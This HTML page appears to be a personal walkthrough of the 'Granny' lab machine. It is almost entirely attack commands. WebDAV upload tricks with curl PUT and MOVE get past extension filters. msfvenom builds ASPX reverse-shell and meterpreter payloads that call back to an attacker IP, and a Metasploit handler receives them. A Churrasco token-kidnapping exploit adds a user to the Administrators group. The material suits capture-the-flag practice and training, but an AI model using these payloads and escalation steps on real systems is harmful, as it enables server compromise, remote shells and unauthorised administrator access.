<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Granny [WebDAV]</title>
</head><body><b>Testing WebDAV:<br/>
</b>====================================<br/>
davtest --url http://10.10.10.15 <br/>
<b>WebDav Detection:<br/>
</b><b>====================================</b><br/>
nmap --script http-webdav-scan -p80,8080 &lt;target&gt; &nbsp;<br/>
nmap -p 80 192.168.43.144 --script http-put --script-args http-put.url='/test/exploit2.php',http-put.file='shell.php'<br/>
<b><br/>
Upload a file to Webdav Using Curl:<br/>
</b><b>====================================</b><br/>
curl -X PUT http://10.10.10.15/test.html -d @test.html <br/>
curl -X MOVE --header 'Destination:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html' &nbsp;<br/>
<br/>
<b>WebDav Bypass Restrictions:<br/>
</b><b>====================================</b><br/>
upload the file as shell.txt<br/>
move / copy the file shell.txt to shell.asp;.txt<br/>
<b><br/>
WebDav Connection:<br/>
</b><b>===================================</b><br/>
cadaver X.X.X.X &nbsp;<br/>
<br/>
<br/>
<b>Genereate ASPX reverse Shell:<br/>
</b><b>====================================</b><br/>
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.7 LPORT=1234 -o shell.aspx <br/>
<br/>
<b>Shell Upload:<br/>
</b><b>====================================</b><br/>
mv shell.aspx shell.txt <br/>
curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.txt<br/>
curl -X MOVE --header 'Destination:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt' <br/>
<br/>
<b><br/>
Privilege Escalation:<br/>
</b><b>====================================</b><br/>
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git <br/>
pip install xlrd --upgrade <br/>
./windows-exploit-suggester.py --update &nbsp; &gt;&gt;&gt; Update the Database<br/>
<b><br/>
This creates an excel spreadsheet from the Microsoft vulnerability database in the working directory.<br/>
</b><b>The next step is to retrieve the system information from the target machine. This can be done using the “<i>systeminfo</i>” command.</b><br/>
<br/>
<b>Copy the output and save it in the file “<i>systeminfo.txt</i>” on the attack machine. Then run the following command.</b><br/>
./windows-exploit-suggester.py --database 2020-02-17-mssb.xls --systeminfo systeminfo.txt <br/>
<b><br/>
Windows Switch User:<br/>
</b><b>====================================</b><br/>
<i>Command: runas /user:username program<br/>
</i><i>Through PowerShell:</i><br/>
<a href="https://medium.com/@asfiyashaikh10/windows-privilege-escalation-using-sudo-su-ae5573feccd9">https://medium.com/@asfiyashaikh10/windows-privilege-escalation-using-sudo-su-ae5573feccd9</a>&nbsp; <br/>
<br/>
<b>Exploitation Code:<br/>
</b><b>=============</b><br/>
<span style="font-size: 10pt"><span style="font-family: Roboto"><div style="text-align: left">Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation</div></span></span><br/>
<a href="https://www.exploit-db.com/exploits/6705">https://www.exploit-db.com/exploits/6705</a>&nbsp; <br/>
Compiled Binary: <a href="https://github.com/Re4son/Churrasco">https://github.com/Re4son/Churrasco</a>&nbsp; <br/>
<br/>
<b>Usage Example:</b><br/>
Let’s use the executable to add a user on the system that is part of the <i>Administrators</i> group.<br/>
<i>churrasco.exe "net user test test /add &amp;&amp; net localgroup Administrators test /add" </i><br/>
&nbsp;<br/>
<b><br/>
<br/>
Metasploit Exploitation:<br/>
====================================<br/>
</b>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=8888 -f aspx &gt; met-shell.aspx <br/>
cp met-shell.aspx met-shell.txt &nbsp;<br/>
curl -X PUT http://10.10.10.15/met-shell.txt --data-binary @met-shell.txt<br/>
curl -X MOVE -H 'Destination: http://10.10.10.15/met-shell.aspx' http://10.10.10.15/met-shell.txt &nbsp;<br/>
<br/>
<br/>
<b>Configure metasploit to receive the reverse shell.<br/>
</b>use exploit/multi/handler <br/>
set lhost tun0 <br/>
set lport 8888 &nbsp;<br/>
background<br/>
use post/multi/recon/local_exploit_suggester<br/>
set session 1<br/>
<br/>
</body></html>